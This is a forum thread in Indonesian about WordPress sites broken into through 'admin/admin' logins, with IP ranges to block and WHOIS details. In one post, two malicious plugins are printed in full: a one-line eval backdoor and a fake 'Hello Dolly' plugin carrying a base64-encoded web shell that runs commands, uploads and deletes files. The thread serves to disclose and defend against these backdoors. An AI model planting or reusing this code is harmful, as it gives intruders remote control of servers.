Jangan Gunakan admin Sebagai User dan Password WordPress

[adi88nugroho]

sumber: _adinugroho.web.id/my-diary/jangan-gunakan-admin-sebagai-user-dan-password-wordpress.html

Baru saja saya bersih-bersih dan menemukan ternyata ada juga website salah satu client yang disusupi dengan plugin ToolsPack dan juga P_music_player. Dari mana dia masuk? Setelah saya cek log ternyata dia tidak masuk melalui bugs pada plugin, theme atau WordPress core. Tetapi dia scan semua website WordPress yang menggunakan kata “admin” sebagai user dan passwordnya. Jadi bagi anda yang menggunakan user admin dan password admin, kemungkinan website WordPress anda akan disusupi.
Untuk lebih amannya silahkan block range IP Address ini: 109.110.177.0/24 dan 83.69.224.0/24. Itu adalah range IP Address yang digunakan oleh penyusup.

P_music_player dan ToolsPack adalah malware/backdoor yang menyamar menjadi plugin.

 

[JOGLOMedia]

makasih banyak infonya pak,
btw klo saya block ip 109.110.177.0/24 dan 83.69.224.0/24 tersebut berpengaruh ke visitor atau lainnya tidak?
bisa minta script pluginnya yg suspect tsbt

 

[galuh82]

itu blok ip luar semua ..

hasil ip whois:

inetnum: 109.110.176.0 - 109.110.183.255
netname: SHABDIZ-TELECOM-NETWORK
descr: Shabdiz Telecom Network JSC
country: IR
admin-c: OMID1-RIPE
tech-c: OMID1-RIPE
status: ASSIGNED PA
mnt-by: omidkosari-mnt
mnt-domains: omidkosari-mnt
changed: [Email Removed] 20101207
source: RIPE

Read more: IP Address WHOIS Lookup

inetnum: 83.69.224.0 - 83.69.224.255
netname: AZZRU1-NET
descr: Azz.ru
country: RU
admin-c: GT2699-RIPE
tech-c: GT2699-RIPE
status: ASSIGNED PA
mnt-by: AWAX-MNT
changed: [Email Removed] 20071004
source: RIPE

Read more: IP Address WHOIS Lookup

 

[adi88nugroho]

makasih banyak infonya pak,
btw klo saya block ip 109.110.177.0/24 dan 83.69.224.0/24 tersebut berpengaruh ke visitor atau lainnya tidak?
bisa minta script pluginnya yg suspect tsbt

Itu IP Rusia dan Iran. Jarang real visitor datang dari situ. Jadinya ga terlalu berpengaruh.
Yg toolspack sourcenya kayak gini

<?php
 /*
 Plugin Name: ToolsPack
 Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
 Version: 1.2
 Author: Mark Stain
 Author URI: http://checkWPTools.com/
 */
 $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
 ?>

yg P_Music_player kayak gini

<?php
/**
 * @package Hello_Dolly
 * @version 1.6
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/extend/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and
enthusiasm of an entire generation summed up in two words sung most
famously by Louis Armstrong: Hello, Dolly. When activated you will
randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right
of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.6
*/
?>
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0KCk7DQokcGFzc3dvcmQ9J2Q4NTc4ZWRmODQ1OGNlMDZmYmM1YmI3NmE1OGM1Y2E0JzsNCmlmKG1kNSgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pPT0kcGFzc3dvcmQgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVRPUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID09ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQpe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGhyKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGFyZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDogPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3JtPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXBsb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9mb3JtPic7DQp9'));
?>

 

[PusatHosting]

Saya sempat temukan beberapa situs yang kena hack ternyata karena menggunakan password default seperti adminass atau admin:admin mungkin juga karena ini.
thanks sharenya.

 

[indoc0der]

saya pernah dapat tools buat scan website dengan mengambil user dan password dari file .txt yang sudah ditentukan. defaultnya memang yang menggunakan kata admin, 123456, nimda, dan yang semisalnya.